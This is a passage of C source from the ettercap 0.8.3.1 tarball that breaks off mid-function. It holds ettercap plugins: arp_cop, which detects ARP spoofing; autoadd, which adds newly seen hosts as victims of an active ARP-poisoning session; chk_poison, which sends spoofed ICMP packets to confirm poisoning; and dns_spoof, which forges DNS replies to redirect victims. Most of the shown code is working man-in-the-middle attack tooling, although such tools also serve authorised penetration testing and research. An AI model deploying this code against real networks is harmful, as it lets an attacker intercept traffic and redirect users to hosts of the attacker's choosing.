void arp_init_list(void); /* globals */ LIST_HEAD(, hosts_list) arp_cop_table; /* plugin operations */ struct plugin_ops arp_cop_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "arp_cop", /* a short description of the plugin (max 50 chars) */ .info = "Report suspicious ARP activity", /* the plugin version. */ .version = "1.1", /* activation function */ .init = &arp_cop_init, /* deactivation function */ .fini = &arp_cop_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &arp_cop_ops); } /******************* STANDARD FUNCTIONS *******************/ static int arp_cop_init(void *dummy) { /* variable not used */ (void) dummy; USER_MSG("arp_cop: plugin running...\n"); arp_init_list(); hook_add(HOOK_PACKET_ARP_RQ, &parse_arp); hook_add(HOOK_PACKET_ARP_RP, &parse_arp); return PLUGIN_RUNNING; } static int arp_cop_fini(void *dummy) { /* variable not used */ (void) dummy; USER_MSG("arp_cop: plugin terminated...\n"); /* We don't free the global list for further reuse */ hook_del(HOOK_PACKET_ARP_RQ, &parse_arp); hook_del(HOOK_PACKET_ARP_RP, &parse_arp); return PLUGIN_FINISHED; } /*********************************************************/ /* Parse the arp packets */ static void parse_arp(struct packet_object *po) { char tmp1[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; char str1[ETH_ASCII_ADDR_LEN]; char str2[ETH_ASCII_ADDR_LEN]; char found = 0; struct hosts_list *h1, *h2; LIST_FOREACH(h1, &arp_cop_table, next) { /* The IP address is already in the list */ if(!ip_addr_cmp(&po->L3.src, &h1->ip)) { /* This is its normal MAC address */ if (!memcmp(po->L2.src, h1->mac, MEDIA_ADDR_LEN)) return; /* Someone is spoofing, check if we already know its mac address */ LIST_FOREACH(h2, &arp_cop_table, next) { if (!memcmp(po->L2.src, h2->mac, MEDIA_ADDR_LEN)) { /* don't report my own poisoning */ if (ip_addr_cmp(&h2->ip, &EC_GBL_IFACE->ip)) USER_MSG("arp_cop: (WARNING) %s[%s] pretends to be %s[%s]\n", ip_addr_ntoa(&h2->ip, tmp1), mac_addr_ntoa(h2->mac, str1), ip_addr_ntoa(&h1->ip, tmp2), mac_addr_ntoa(h1->mac, str2)); return; } } /* A new NIC claims an existing IP address */ USER_MSG("arp_cop: (IP-conflict) [%s] wants to be %s[%s]\n", mac_addr_ntoa(po->L2.src, str1), ip_addr_ntoa(&h1->ip, tmp1), mac_addr_ntoa(h1->mac, str2)); return; } } /* The IP address is not yet in the list */ LIST_FOREACH(h1, &arp_cop_table, next) { if (!memcmp(po->L2.src, h1->mac, MEDIA_ADDR_LEN)) { USER_MSG("arp_cop: (IP-change) [%s] %s -> %s\n", mac_addr_ntoa(h1->mac, str1), ip_addr_ntoa(&h1->ip, tmp1), ip_addr_ntoa(&po->L3.src, tmp2)); found = 1; } } if (!found) USER_MSG("arp_cop: (new host) %s[%s]\n", ip_addr_ntoa(&po->L3.src, tmp1), mac_addr_ntoa(po->L2.src, str1)); /* Insert the host in th list */ SAFE_CALLOC(h1, 1, sizeof(struct hosts_list)); memcpy(&h1->ip, &po->L3.src, sizeof(struct ip_addr)); memcpy(h1->mac, po->L2.src, MEDIA_ADDR_LEN); LIST_INSERT_HEAD(&arp_cop_table, h1, next); } static void arp_init_list() { struct hosts_list *h1, *h2; /* If we have already run it once */ if(!LIST_EMPTY(&arp_cop_table)) return; /* Fill the arp_cop_table with the initial host list */ LIST_FOREACH(h1, &EC_GBL_HOSTLIST, next) { SAFE_CALLOC(h2, 1, sizeof(struct hosts_list)); memcpy(&h2->ip, &h1->ip, sizeof(struct ip_addr)); memcpy(h2->mac, h1->mac, MEDIA_ADDR_LEN); LIST_INSERT_HEAD(&arp_cop_table, h2, next); } /* Add our IP address */ SAFE_CALLOC(h2, 1, sizeof(struct hosts_list)); memcpy(&h2->ip, &EC_GBL_IFACE->ip, sizeof(struct ip_addr)); memcpy(h2->mac, EC_GBL_IFACE->mac, MEDIA_ADDR_LEN); LIST_INSERT_HEAD(&arp_cop_table, h2, next); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/autoadd/000775 000000 000000 00000000000 13711276346 016641 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/autoadd/autoadd.c000664 000000 000000 00000013135 13711276346 020431 0ustar00rootroot000000 000000 /* autoadd -- ettercap plugin -- Report suspicious ARP activity Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include /* protos */ int plugin_load(void *); static int autoadd_init(void *); static int autoadd_fini(void *); static void parse_arp(struct packet_object *po); static int add_to_victims(void *group, struct packet_object *po); /* plugin operations */ struct plugin_ops autoadd_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "autoadd", /* a short description of the plugin (max 50 chars) */ .info = "Automatically add new victims in the target range", /* the plugin version. */ .version = "1.2", /* activation function */ .init = &autoadd_init, /* deactivation function */ .fini = &autoadd_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &autoadd_ops); } /******************* STANDARD FUNCTIONS *******************/ static int autoadd_init(void *dummy) { /* variable not used */ (void) dummy; /* * we'll use arp request to detect active hosts. * if an host sends arp rq, it want to communicate, * so it is alive */ hook_add(HOOK_PACKET_ARP_RQ, &parse_arp); return PLUGIN_RUNNING; } static int autoadd_fini(void *dummy) { /* variable not used */ (void) dummy; hook_del(HOOK_PACKET_ARP_RQ, &parse_arp); return PLUGIN_FINISHED; } /*********************************************************/ /* Parse the arp packets */ static void parse_arp(struct packet_object *po) { char tmp[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; struct ip_list *t; /* if arp poisonin is not running, do nothing */ if (!is_mitm_active("arp")) return; /* don't add our addresses */ if (!ip_addr_cmp(&EC_GBL_IFACE->ip, &po->L3.src)) return; if (!memcmp(&EC_GBL_IFACE->mac, &po->L2.src, MEDIA_ADDR_LEN)) return; /* don't add undefined address */ if (ip_addr_is_zero(&po->L3.src)) return; /* search in target 1 */ if (EC_GBL_TARGET1->all_ip) { if (add_to_victims(&arp_group_one, po) == E_SUCCESS) USER_MSG("autoadd: %s %s added to GROUP1\n", ip_addr_ntoa(&po->L3.src, tmp), mac_addr_ntoa(po->L2.src, tmp2)); } else { LIST_FOREACH(t, &EC_GBL_TARGET1->ips, next) if (!ip_addr_cmp(&t->ip, &po->L3.src)) if (add_to_victims(&arp_group_one, po) == E_SUCCESS) USER_MSG("autoadd: %s %s added to GROUP1\n", ip_addr_ntoa(&po->L3.src, tmp), mac_addr_ntoa(po->L2.src, tmp2)); } /* search in target 2 */ if (EC_GBL_TARGET2->all_ip) { if (add_to_victims(&arp_group_two, po) == E_SUCCESS) USER_MSG("autoadd: %s %s added to GROUP2\n", ip_addr_ntoa(&po->L3.src, tmp), mac_addr_ntoa(po->L2.src, tmp2)); } else { LIST_FOREACH(t, &EC_GBL_TARGET2->ips, next) if (!ip_addr_cmp(&t->ip, &po->L3.src)) if (add_to_victims(&arp_group_two, po) == E_SUCCESS) USER_MSG("autoadd: %s %s added to GROUP2\n", ip_addr_ntoa(&po->L3.src, tmp), mac_addr_ntoa(po->L2.src, tmp2)); } } /* * add a victim to the right group. * the arp poisoning thread will automatically pick it up * since this function modifies directy the mitm internal lists */ static int add_to_victims(void *group, struct packet_object *po) { char tmp[MAX_ASCII_ADDR_LEN]; struct hosts_list *h; LIST_HEAD(, hosts_list) *head = group; (void)tmp; /* search if it was already inserted in the list */ LIST_FOREACH(h, head, next) if (!ip_addr_cmp(&h->ip, &po->L3.src)) return -E_NOTHANDLED; SAFE_CALLOC(h, 1, sizeof(struct hosts_list)); memcpy(&h->ip, &po->L3.src, sizeof(struct ip_addr)); memcpy(&h->mac, &po->L2.src, MEDIA_ADDR_LEN); DEBUG_MSG("autoadd: added %s to arp groups", ip_addr_ntoa(&h->ip, tmp)); LIST_INSERT_HEAD(head, h, next); /* add the host even in the hosts list */ LIST_FOREACH(h, &EC_GBL_HOSTLIST, next) if (!ip_addr_cmp(&h->ip, &po->L3.src)) return E_SUCCESS; /* * we need another copy, since the group lists * are freed by the mitm process */ SAFE_CALLOC(h, 1, sizeof(struct hosts_list)); memcpy(&h->ip, &po->L3.src, sizeof(struct ip_addr)); memcpy(&h->mac, &po->L2.src, MEDIA_ADDR_LEN); DEBUG_MSG("autoadd: added %s to hosts list", ip_addr_ntoa(&h->ip, tmp)); LIST_INSERT_HEAD(&EC_GBL_HOSTLIST, h, next); return E_SUCCESS; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/chk_poison/000775 000000 000000 00000000000 13711276346 017354 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/chk_poison/chk_poison.c000664 000000 000000 00000014507 13711276346 021663 0ustar00rootroot000000 000000 /* chk_poison -- ettercap plugin -- Check if the poisoning had success it sends a spoofed icmp packets to each victim with the address of any other target and listen for "forwardable" replies. Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include #include #include #include struct poison_list { struct ip_addr ip[2]; char poison_success[2]; SLIST_ENTRY(poison_list) next; }; /* globals */ SLIST_HEAD(, poison_list) poison_table; /* mutexes */ static pthread_mutex_t poison_mutex = PTHREAD_MUTEX_INITIALIZER; #define POISON_LOCK do{ pthread_mutex_lock(&poison_mutex); } while(0) #define POISON_UNLOCK do{ pthread_mutex_unlock(&poison_mutex); } while(0) /* protos */ int plugin_load(void *); static int chk_poison_init(void *); static int chk_poison_fini(void *); static void parse_icmp(struct packet_object *po); /* plugin operations */ struct plugin_ops chk_poison_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "chk_poison", /* a short description of the plugin (max 50 chars) */ .info = "Check if the poisoning had success", /* the plugin version. */ .version = "1.1", /* activation function */ .init = &chk_poison_init, /* deactivation function */ .fini = &chk_poison_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { return plugin_register(handle, &chk_poison_ops); } /******************* STANDARD FUNCTIONS *******************/ static int chk_poison_init(void *dummy) { char tmp1[MAX_ASCII_ADDR_LEN]; char tmp2[MAX_ASCII_ADDR_LEN]; struct hosts_list *g1, *g2; struct poison_list *p; char poison_any, poison_full; u_char i; /* variable not used */ (void) dummy; /* don't show packets while operating */ EC_GBL_OPTIONS->quiet = 1; if (LIST_EMPTY(&arp_group_one) || LIST_EMPTY(&arp_group_two)) { INSTANT_USER_MSG("chk_poison: You have to run this plugin during a poisoning session.\n\n"); return PLUGIN_FINISHED; } /* Create a list with all poisoning targets */ LIST_FOREACH(g1, &arp_group_one, next) { LIST_FOREACH(g2, &arp_group_two, next) { /* equal ip must be skipped, you cant poison itself */ if (!ip_addr_cmp(&g1->ip, &g2->ip)) continue; /* create the element and insert it in the list */ SAFE_CALLOC(p, 1, sizeof(struct poison_list)); memcpy(&(p->ip[0]), &g1->ip, sizeof(struct ip_addr)); memcpy(&(p->ip[1]), &g2->ip, sizeof(struct ip_addr)); SLIST_INSERT_HEAD(&poison_table, p, next); } } /* Add the hook to collect ICMP replies from the victim */ hook_add(HOOK_PACKET_ICMP, &parse_icmp); INSTANT_USER_MSG("chk_poison: Checking poisoning status...\n"); /* Send spoofed ICMP echo request to each victim */ SLIST_FOREACH(p, &poison_table, next) { for (i = 0; i <= 1; i++) { send_L3_icmp_echo(&(p->ip[i]), &(p->ip[!i])); ec_usleep(MILLI2MICRO(EC_GBL_CONF->arp_storm_delay)); } } /* wait for the response */ ec_usleep(SEC2MICRO(1)); /* remove the hook */ hook_del(HOOK_PACKET_ICMP, &parse_icmp); /* To check if all was poisoned, or no one */ poison_any = 0; poison_full = 1; /* We'll parse the list twice to avoid too long results printing */ SLIST_FOREACH(p, &poison_table, next) { for (i = 0; i <= 1; i++) if (p->poison_success[i]) poison_any = 1; else poison_full = 0; } /* Order does matter :) */ if (!poison_any) INSTANT_USER_MSG("chk_poison: No poisoning at all :(\n"); else if (poison_full) INSTANT_USER_MSG("chk_poison: Poisoning process successful!\n"); else SLIST_FOREACH(p, &poison_table, next) { for (i=0; i<=1; i++) if (!p->poison_success[i]) INSTANT_USER_MSG("chk_poison: No poisoning between %s -> %s\n", ip_addr_ntoa(&(p->ip[i]), tmp1), ip_addr_ntoa(&(p->ip[!i]), tmp2) ); } POISON_LOCK; /* delete the poisoning list */ while (!SLIST_EMPTY(&poison_table)) { p = SLIST_FIRST(&poison_table); SLIST_REMOVE_HEAD(&poison_table, next); SAFE_FREE(p); } POISON_UNLOCK; return PLUGIN_FINISHED; } static int chk_poison_fini(void *dummy) { /* variable not used */ (void) dummy; return PLUGIN_FINISHED; } /*********************************************************/ /* Check if it's the reply to our bougs request */ static void parse_icmp(struct packet_object *po) { struct poison_list *p; /* If the packet is not forwardable we haven't received it * because of the poisoning */ if (!(po->flags & PO_FORWARDABLE)) return; /* Check if it's in the poisoning list. If so this poisoning * is successful. */ POISON_LOCK; SLIST_FOREACH(p, &poison_table, next) { if (!ip_addr_cmp(&(po->L3.src), &(p->ip[0])) && !ip_addr_cmp(&(po->L3.dst), &(p->ip[1]))) p->poison_success[0] = 1; if (!ip_addr_cmp(&(po->L3.src), &(p->ip[1])) && !ip_addr_cmp(&(po->L3.dst), &(p->ip[0]))) p->poison_success[1] = 1; } POISON_UNLOCK; } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/plug-ins/dns_spoof/000775 000000 000000 00000000000 13711276346 017212 5ustar00rootroot000000 000000 ettercap-0.8.3.1/plug-ins/dns_spoof/dns_spoof.c000664 000000 000000 00000121527 13711276346 021360 0ustar00rootroot000000 000000 /* dns_spoof -- ettercap plugin -- spoofs dns reply Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include /* required for global variables */ #include /* required for plugin ops */ #include #include #include #include #include #include #ifndef ns_t_wins #define ns_t_wins 0xFF01 /* WINS name lookup */ #endif /* Maximum DNS TTL according to RFC 2181 = 2^31 - 1*/ #define MAX_DNS_TTL INT_MAX /* globals */ struct dns_header { u_int16 id; /* DNS packet ID */ #ifdef WORDS_BIGENDIAN u_char qr: 1; /* response flag */ u_char opcode: 4; /* purpose of message */ u_char aa: 1; /* authoritative answer */ u_char tc: 1; /* truncated message */ u_char rd: 1; /* recursion desired */ u_char ra: 1; /* recursion available */ u_char unused: 1; /* unused bits */ u_char ad: 1; /* authentic data from named */ u_char cd: 1; /* checking disabled by resolver */ u_char rcode: 4; /* response code */ #else /* WORDS_LITTLEENDIAN */ u_char rd: 1; /* recursion desired */ u_char tc: 1; /* truncated message */ u_char aa: 1; /* authoritative answer */ u_char opcode: 4; /* purpose of message */ u_char qr: 1; /* response flag */ u_char rcode: 4; /* response code */ u_char cd: 1; /* checking disabled by resolver */ u_char ad: 1; /* authentic data from named */ u_char unused: 1; /* unused bits */ u_char ra: 1; /* recursion available */ #endif u_int16 num_q; /* Number of questions */ u_int16 num_answer; /* Number of answer resource records */ u_int16 num_auth; /* Number of authority resource records */ u_int16 num_res; /* Number of additional resource records */ }; struct dns_spoof_entry { int type; /* ns_t_a, ns_t_mx, ns_t_ptr, ns_t_wins */ u_int32 ttl; /* 0 - 2^31-1 seconds */ char *name; struct ip_addr ip; u_int16 port; char *text; SLIST_ENTRY(dns_spoof_entry) next; }; struct rr_entry { u_char *data; int size; SLIST_ENTRY(rr_entry) next; }; static SLIST_HEAD(, dns_spoof_entry) dns_spoof_head; static SLIST_HEAD(, rr_entry) answer_list; static SLIST_HEAD(, rr_entry) authority_list; static SLIST_HEAD(, rr_entry) additional_list; /* protos */ int plugin_load(void *); static int dns_spoof_init(void *); static int dns_spoof_fini(void *); static int load_db(void); static int parse_line(const char *str, int line, int *type_p, char **ip_p, u_int16 *port_p, char **name_p, u_int32 *ttl_p); static void dns_spoof(struct packet_object *po); static int prepare_dns_reply(u_char *data, const char *name, int type, int *dns_len, int *n_answ, int *n_auth, int *n_addi); static int get_spoofed_a(const char *a, struct ip_addr **ip, u_int32 *ttl); static int get_spoofed_aaaa(const char *a, struct ip_addr **ip, u_int32 *ttl); static int get_spoofed_txt(const char *name, char **txt, u_int32 *ttl); static int get_spoofed_ptr(const char *arpa, char **a, u_int32 *ttl); static int get_spoofed_mx(const char *a, struct ip_addr **ip, u_int32 *ttl); static int get_spoofed_wins(const char *a, struct ip_addr **ip, u_int32 *ttl); static int get_spoofed_srv(const char *name, struct ip_addr **ip, u_int16 *port, u_int32 *ttl); char *type_str(int type); static void dns_spoof_dump(void); /* plugin operations */ struct plugin_ops dns_spoof_ops = { /* ettercap version MUST be the global EC_VERSION */ .ettercap_version = EC_VERSION, /* the name of the plugin */ .name = "dns_spoof", /* a short description of the plugin (max 50 chars) */ .info = "Sends spoofed dns replies", /* the plugin version. */ .version = "1.3", /* activation function */ .init = &dns_spoof_init, /* deactivation function */ .fini = &dns_spoof_fini, }; /**********************************************************/ /* this function is called on plugin load */ int plugin_load(void *handle) { /* load the database of spoofed replies (etter.dns) * return an error if we could not open the file */ if (load_db() != E_SUCCESS) return -E_INVALID; dns_spoof_dump(); return plugin_register(handle, &dns_spoof_ops); } /*********************************************************/ static int dns_spoof_init(void *dummy) { /* variable not used */ (void) dummy; /* * add the hook in the dissector. * this will pass only valid dns packets */ hook_add(HOOK_PROTO_DNS, &dns_spoof); return PLUGIN_RUNNING; } static int dns_spoof_fini(void *dummy) { struct dns_spoof_entry *d; /* variable not used */ (void) dummy; /* remove the hook */ hook_del(HOOK_PROTO_DNS, &dns_spoof); /* Free dynamically allocated memory */ while (!SLIST_EMPTY(&dns_spoof_head)) { d = SLIST_FIRST(&dns_spoof_head); SLIST_REMOVE_HEAD(&dns_spoof_head, next); SAFE_FREE(d->name); SAFE_FREE(d->text); SAFE_FREE(d); } return PLUGIN_FINISHED; } /* * load the database in the list */ static int load_db(void) { struct dns_spoof_entry *d; FILE *f; char line[100+255+10+1]; char *ptr, *ip, *name; u_int32 ttl; int lines = 0, type; u_int16 port = 0; /* open the file */ f = open_data("etc", ETTER_DNS, FOPEN_READ_TEXT); if (f == NULL) { USER_MSG("dns_spoof: Cannot open %s\n", ETTER_DNS); return -E_INVALID; } /* load it in the list */ while (fgets(line, 100+255+10+1, f)) { /* count the lines */ lines++; /* trim comments */ if ( (ptr = strchr(line, '#')) ) *ptr = '\0'; /* skip empty lines */ if (!*line || *line == '\r' || *line == '\n') continue; /* strip apart the line */ if (!parse_line(line, lines, &type, &ip, &port, &name, &ttl)) continue; /* create the entry */ SAFE_CALLOC(d, 1, sizeof(struct dns_spoof_entry)); d->name = strdup(name); if (d->name == NULL) { USER_MSG("dns_spoof: Unable to allocate memory for d->name\n"); return -E_INVALID; } d->type = type; d->port = port; d->text = NULL; d->ttl = ttl; /* convert the ip address */ if (type == ns_t_txt) { /* Nothing to convert for TXT - just copy the string */ d->text = strndup(ip, 255); if (d->text == NULL) { USER_MSG("dns_spoof: Unable to allocate memory for d->text\n"); free(d->name); free(d); return -E_INVALID; } } else if (ip_addr_pton(ip, &d->ip) != E_SUCCESS) { /* neither IPv4 nor IPv6 - throw a message and skip line */ USER_MSG("dns_spoof: %s:%d Invalid IPv4 or IPv6 address\n", ETTER_DNS, lines); SAFE_FREE(d); continue; } /* insert in the list */ SLIST_INSERT_HEAD(&dns_spoof_head, d, next); } fclose(f); return E_SUCCESS; } /* * Parse line on format " ". */ static int parse_line(const char *str, int line, int *type_p, char **ip_p, u_int16 *port_p, char **name_p, u_int32 *ttl_p) { static char name[100+1]; static char ip[MAX_ASCII_ADDR_LEN]; static u_int16 port; static u_int32 ttl; char type[10+1]; DEBUG_MSG("%s:%d str '%s'", ETTER_DNS, line, str); /* Set default TTL of 1 hour if not specified */ ttl = 3600; /* TTL is optional therefore only require 3 options here */ if (sscanf(str,"%100s %10s %40[^\r\n# ] %u", name, type, ip, &ttl) < 3) { USER_MSG("dns_spoof: %s:%d Invalid entry '%s'\n", ETTER_DNS, line, str); return (0); } /* keep TTL within DNS standard limits (2^31 - 1) - see RFC 2181 */ if (ttl > MAX_DNS_TTL) ttl = 3600; *ttl_p = ttl; if (!strcasecmp(type,"PTR")) { if (strpbrk(name,"*?[]")) { USER_MSG("dns_spoof: %s:%d Wildcards in PTR records are not allowed; %s\n", ETTER_DNS, line, str); return (0); } *type_p = ns_t_ptr; *name_p = name; *ip_p = ip; return (1); } if (!strcasecmp(type,"A")) { *type_p = ns_t_a; *name_p = name; *ip_p = ip; return (1); } if (!strcasecmp(type,"AAAA")) { *type_p = ns_t_aaaa; *name_p = name; *ip_p = ip; return (1); } if (!strcasecmp(type,"MX")) { *type_p = ns_t_mx; *name_p = name; *ip_p = ip; return (1); } if (!strcasecmp(type,"WINS")) { *type_p = ns_t_wins; *name_p = name; *ip_p = ip; return (1); } if (!strcasecmp(type, "TXT")) { char txt[256]; /* rescan line as spaces are supported in TXT records */ if (sscanf(str,"%100s %10s \"%255[^\r\n#\"]\" %u", name, type, txt, &ttl) < 3) { USER_MSG("dns_spoof: %s:%d Invalid entry %s\n", ETTER_DNS, line, str); return 0; } if (ttl > MAX_DNS_TTL) ttl = 3600; /* keep TTL within DNS standard limits (2^31 - 1) - see RFC 2181 */ *type_p = ns_t_txt; *name_p = name; *ip_p = txt; *ttl_p = ttl; return (1); } if (!strcasecmp(type, "SRV")) { /* * SRV records have different syntax */ static char ip_tmp[MAX_ASCII_ADDR_LEN]; if (ec_strsplit_ipport(ip, ip_tmp, &port)) { USER_MSG("dns_spoof: %s:%d Unknown syntax for SRV record; %s\n", ETTER_DNS, line, str); return (0); } *type_p = ns_t_srv; *name_p = name; *ip_p = ip_tmp; *port_p = port; return (1); } USER_MSG("dns_spoof: %s:%d Unknown record type %s\n", ETTER_DNS, line, type); return (0); } /* * parse the packet and send the fake reply */ static void dns_spoof(struct packet_object *po) { struct dns_header *dns; struct rr_entry *rr; struct iface_env *iface; u_char *data, *end, *dns_reply; char name[NS_MAXDNAME]; int name_len, dns_len, dns_off, n_answ, n_auth, n_addi; u_char *q; int16 class; u_int16 type; dns = (struct dns_header *)po->DATA.data; data = (u_char *)(dns + 1); end = (u_char *)dns + po->DATA.len; n_answ = 0; n_auth = 0; n_addi = 0; /* extract the name from the packet */ name_len = dn_expand((u_char *)dns, end, data, name, sizeof(name)); /* move pointer behind the domain name */ q = data + name_len; /* get the type and class */ NS_GET16(type, q); NS_GET16(class, q); /* set initial dns reply length to the length of the question */ dns_len = q - data; /* handle only internet class */ if (class != ns_c_in) return; /* we are interested only in DNS query */ if ( (!dns->qr) && dns->opcode == ns_o_query && htons(dns->num_q) == 1 && htons(dns->num_answer) == 0) { /* * If we are interested in this DNS query this function returns E_SUCCESS. * The DNS reply data is stored in one or more of the single linked lists * 1. answer_list * 2. authority_list * 3. additional_list. * Below, the lists have to be processes in this order and concatenated to the * query in memory. */ if (prepare_dns_reply(data, name, type, &dns_len, &n_answ, &n_auth, &n_addi) != E_SUCCESS) return; /* * do nothing if we haven't prepared anything * this can happen with ANY queries */ if (dns_len <= q - data) return; /* Do not forward query */ po->flags |= PO_DROPPED; /* set incoming interface as outgoing interface for reply */ iface = po->flags & PO_FROMIFACE ? EC_GBL_IFACE : EC_GBL_BRIDGE; /* allocate memory for the dns reply */ SAFE_CALLOC(dns_reply, dns_len, sizeof(u_int8)); /* * fill the buffer with the content of the request * we will append the answer just behind the request */ memcpy(dns_reply, data, q - data); dns_off = q - data; /* collect answers and free list items in one go */ while (!SLIST_EMPTY(&answer_list)) { rr = SLIST_FIRST(&answer_list); /* make sure not to exceed allocated memory */ if (dns_off + rr->size <= dns_len) { /* serialize data */ memcpy(dns_reply + dns_off, rr->data, rr->size); dns_off += rr->size; } /* data not needed any longer - free it */ SLIST_REMOVE_HEAD(&answer_list, next); SAFE_FREE(rr->data); SAFE_FREE(rr); } /* collect authority and free list items in one go */ while (!SLIST_EMPTY(&authority_list)) { rr = SLIST_FIRST(&authority_list); /* make sure not to exceed allocated memory */ if (dns_off + rr->size <= dns_len) { /* serialize data */ memcpy(dns_reply + dns_off, rr->data, rr->size); dns_off += rr->size; } /* data not needed any longer - free it */ SLIST_REMOVE_HEAD(&authority_list, next); SAFE_FREE(rr->data); SAFE_FREE(rr); } /* collect additional and free list items in one go */ while (!SLIST_EMPTY(&additional_list)) { rr = SLIST_FIRST(&additional_list); /* make sure not to exceed allocated memory */ if (dns_off + rr->size <= dns_len) { /* serialize data */ memcpy(dns_reply + dns_off, rr->data, rr->size); dns_off += rr->size; } /* data not needed any longer - free it */ SLIST_REMOVE_HEAD(&additional_list, next); SAFE_FREE(rr->data); SAFE_FREE(rr); } /* send the reply */ send_dns_reply(iface, po->L4.src, &po->L3.dst, &po->L3.src, po->L2.src, ntohs(dns->id), dns_reply, dns_len, n_answ, n_auth, n_addi); /* spoofed DNS reply sent - free memory */ SAFE_FREE(dns_reply); } } /* * checks if a spoof entry extists for the name and type * the answer is prepared and stored in the global lists * - answer_list * - authority_list * - additional_list */ static int prepare_dns_reply(u_char *data, const char *name, int type, int *dns_len, int *n_answ, int *n_auth, int *n_addi) { struct ip_addr *reply; struct rr_entry *rr; bool is_negative; int len; u_int32 ttl, dns_ttl; u_char *answer, *p; char tmp[MAX_ASCII_ADDR_LEN]; /* set TTL to 1 hour by default or in case something goes wrong */ ttl = 3600; dns_ttl = htonl(ttl); /* reorder bytes for network stuff */ /* by default we want to spoof actual data */ is_negative = false; /* it is and address resolution (name to ip) */ if (type == ns_t_a || type == ns_t_any) { /* found the reply in the list */ if (get_spoofed_a(name, &reply, &ttl) != E_SUCCESS) { /* in case of ANY we have to proceed with the next section */ if (type == ns_t_any) goto any_aaaa; else return -E_NOTFOUND; } /* check if the family matches the record type */ if (ntohs(reply->addr_type) != AF_INET) { USER_MSG("dns_spoof: can not spoof A record for %s " "because the value is not a IPv4 address\n", name); return -E_INVALID; } /* * When spoofed IP address is undefined address, we stop * processing of this section by spoofing a negative-cache reply */ if (ip_addr_is_zero(reply)) { /* * we want to answer this requests with a negative-cache reply * instead of spoofing a IP address */ is_negative = true; } else { /* allocate memory for the answer */ len = 12 + IP_ADDR_LEN; SAFE_CALLOC(answer, len, sizeof(u_char)); p = answer; /* convert to network-byte order */ dns_ttl = htonl(ttl); /* prepare the answer */ memcpy(p, "\xc0\x0c", 2); /* compressed name offset */ memcpy(p + 2, "\x00\x01", 2); /* type A */ memcpy(p + 4, "\x00\x01", 2); /* class */ memcpy(p + 6, &dns_ttl, 4); /* TTL */ memcpy(p + 10, "\x00\x04", 2); /* datalen */ ip_addr_cpy(p + 12, reply); /* data */ /* insert the answer into the list */ SAFE_CALLOC(rr, 1, sizeof(struct rr_entry)); rr->data = answer; rr->size = len; SLIST_INSERT_HEAD(&answer_list, rr, next); *dns_len += len; *n_answ += 1; USER_MSG("dns_spoof: %s [%s] spoofed to [%s] TTL [%u s]\n", type_str(type), name, ip_addr_ntoa(reply, tmp), ttl); } } /* A */ any_aaaa: /* also care about AAAA records */ if (type == ns_t_aaaa || type == ns_t_any) { /* found the reply in the list */ if (get_spoofed_aaaa(name, &reply, &ttl) != E_SUCCESS) { /* in case of ANY we have to proceed with the next section */ if (type == ns_t_any) goto any_mx; else return -E_NOTFOUND; } /* check if the family matches the record type */ if (ntohs(reply->addr_type) != AF_INET6) { USER_MSG("dns_spoof: can not spoof AAAA record for %s " "because the value is not a IPv6 address\n", name); return -E_INVALID; } /* * When spoofed IP address is undefined address, we stop * processing of this section by spoofing a negative-cache reply */ if (ip_addr_is_zero(reply)) { /* * we want to answer this requests with a negative-cache reply * instead of spoofing a IP address */ is_negative = true; } else { /* allocate memory for the answer */ len = 12 + IP6_ADDR_LEN; SAFE_CALLOC(answer, len, sizeof(u_char)); p = answer; /* convert to network-byte order */ dns_ttl = htonl(ttl); /* prepare the answer */ memcpy(p, "\xc0\x0c", 2); /* compressed name offset */ memcpy(p + 2, "\x00\x1c", 2); /* type AAAA */ memcpy(p + 4, "\x00\x01", 2); /* class IN */ memcpy(p + 6, &dns_ttl, 4); /* TTL */ memcpy(p + 10, "\x00\x10", 2); /* datalen */ ip_addr_cpy(p + 12, reply); /* data */ /* insert the answer into the list */ SAFE_CALLOC(rr, 1, sizeof(struct rr_entry)); rr->data = answer; rr->size = len; SLIST_INSERT_HEAD(&answer_list, rr, next); *dns_len += len; *n_answ += 1; 